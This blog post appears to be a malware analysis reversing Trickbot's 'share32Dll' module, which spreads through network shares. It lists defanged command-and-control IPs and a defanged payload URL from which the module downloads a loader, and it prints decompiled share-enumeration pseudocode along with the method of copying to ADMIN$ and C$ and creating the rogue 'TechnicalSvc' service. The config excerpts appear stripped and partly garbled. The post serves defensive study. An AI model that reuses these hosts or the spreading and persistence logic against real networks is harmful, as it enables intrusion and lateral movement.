Let’s Learn: Reversing Trickbot Banking Trojan’s New "WormShare" Persistence Module

Goal: Reverse the latest Trickbot’s module called “shareDll32” used for malware spreading in network shares. It is meant for effective operation in tandem with its worm32Dll module.
Source:
Background
While analyzing one of the latest Trickbot group tag “mac1/tot1/tt0002” email spam campaign (subject: “Copy of Invoice – {rand}”) (thanks to @dvk01uk) identified a newly deployed “share32Dll” module.
The decoded module contains four usual Trickbot exported functions:
Start
Control
FreeBuffer
Release
The observed Trickbot main config module was as follows (version 1000053):
   1000053
   tt0002
  
      91.83.88[.]51:449
      188.137.122[.]105:449
      188.137.122[.]5:449
      187.248.44[.]85:449
      187.248.44[.]84:449
      194.87.99[.]117:443
      195.133.145[.]222:443
      185.99.2[.]78:443
      88.150.197[.]173:443
      195.133.144[.]27:443
      194.87.99[.]225:443
      185.99.2[.]79:443
      62.141.34[.]242:443
      194.87.93[.]97:443
      5.133.179[.]236:443
      185.212.128[.]91:443
      91.211.246[.]131:443
      185.99.2[.]100:443
      95.46.45[.]164:443
      185.212.128[.]90:443
      107.167.24[.]135:443
      194.87.92[.]223:443
      194.87.238[.]225:443
      178.156.202[.]74:443
      178.156.202[.]117:443
      93.171.216[.]33:443
      93.171.217[.]7:443
  
  
     
     
  
   
Summary
share32Dll, compiled via ‘GCC: (Rev1, Built by MSYS2 project) 6.3.0,’ allows Trickbot operators to spread in network shares and establishes persistency via registering services leveraging common Windows API calls. This module appears to be meant to be used in tandem with the worm32Dll module to spread Trickbot across local networks and shares via ETERNALBLUE SMB exploit and LDAP queries.
The observed methods in the share32Dll module are as follows:
I. Download Trickbot loader copy from the payload URL 
hxxp://duhasti8[.]beget[.]tech/toler[.]png and save it locally as “setup.exe“leveraging WINHTTP.dll API calls with the so-called “WormShare” function, named by the Trickbot operators. 
The following API calls are used:
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WinHttpCloseHandle

II. Enumerate local network resources using Mpr DLL API calls in combination with GetComputerNameW for possible username directories shares:

WNetOpenEnumW* (WORD dwScope = ‘2u’)* 
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW*
WNetAddConnection2W
*The parameter ‘2u’ ensures all connections in the network are in scope.
v16 = WNetOpenEnumW(2u, 0, 0, a1, &hEnum);,
                                                
  if ( !v16 )
  {
    v1 = GetProcessHeap();
    Dst = HeapAlloc(v1, 8u, dwBytes);
    if ( Dst )
    {
      do
      {
        memset(Dst, 0, dwBytes);
        v15 = WNetEnumResourceW(hEnum, &cCount, Dst, &dwBytes);
        if ( v15 )
        {
          if ( v15 != 259 )
            break;
        }
        else
        {
          while ( v23 < cCount )
          {
            if ( *((_DWORD *)Dst + 8 * v23 + 2) == 2 )
            {
              nSize = 15;
              Str1 = 92;
              v7 = 92;
              if ( GetComputerNameW((LPWSTR)&v8, &nSize) == 0 )
                goto LABEL_15;
              if ( wcscmp(&Str1, *((const wchar_t **)Dst + 8 * v23 + 5)) != 0 )
              {
                memset(&NetResource, 0, 0x20u);
                wsprintfW(&v5, “%”, *((_DWORD *)Dst + 8 * v23 + 5));
                NetResource.lpRemoteName = &v5;
                v16 = WNetAddConnection2W(&NetResource, 0, 0, 0);
                if ( !v16 )
                {
                  service_create(*((LPCWSTR *)Dst + 8 * v23 + 5));
                  WNetCancelConnection2W(NetResource.lpRemoteName, 0, 0);
                }
              }
            }
            if ( *((_DWORD *)Dst + 8 * v23 + 3) & 2 )
              service_create1((LPNETRESOURCEW)Dst + v23);
            ++v23;
          }
        }
      }
      while ( v15 != 259 );
    }
  }
LABEL_15:
  if ( hEnum )
    WNetCloseEnum(hEnum);

III. Copies itself to the previously mapped network shares ADMIN$ and C$ as “techsvc[.]exe” and creates a rogue service “TechnicalSvc” using OpenSCManagerW, CreateServiceW, & StartServiceW API calls in the following location:
  • %SystemDrive%\techsvc[.]exe
  • %SystemRoot%\system32\techsvc[.]exe
Template module configuration in XML format is as follows:
yes

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s